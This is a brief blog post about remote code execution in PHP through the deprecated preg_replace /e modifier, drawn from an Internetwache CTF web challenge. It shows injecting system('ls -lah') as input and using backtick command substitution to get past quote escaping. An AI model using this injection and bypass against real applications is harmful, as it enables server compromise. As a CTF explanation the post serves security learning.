If you like to read our old blogs you are welcome, I4INFO
There are high chance of the remote code execution in PHP web applications from improper handling of PCRE(Perl compatible Regular Expression). PCRE is mainly used in preg functions in PHP such as in preg_match and preg_replace.Its safe most of the time, the only case its vulnerable is when you use /e modifier, which allow PHP code execution in preg_replace.
$string = "You are in i4info";
print preg_replace('/(.*)/e','strtoupper("\\1")','$string');
?>
The output would be "YOU ARE IN I4INFO", the main thing is preg_replace can execute any php function.
$string = "system('ls -lah')";
print preg_replace('/(.*)/e','strtoupper("\\1")','$string');
?>
Here the system('ls -lah') gets changed to system(\'ls -lah\'), So there would be some other way to bypass it. This can be changed by using a backtick("`ls -lah`";")
This was one of the problems in web in Internetwache CTF.
Thank you for reading the blog!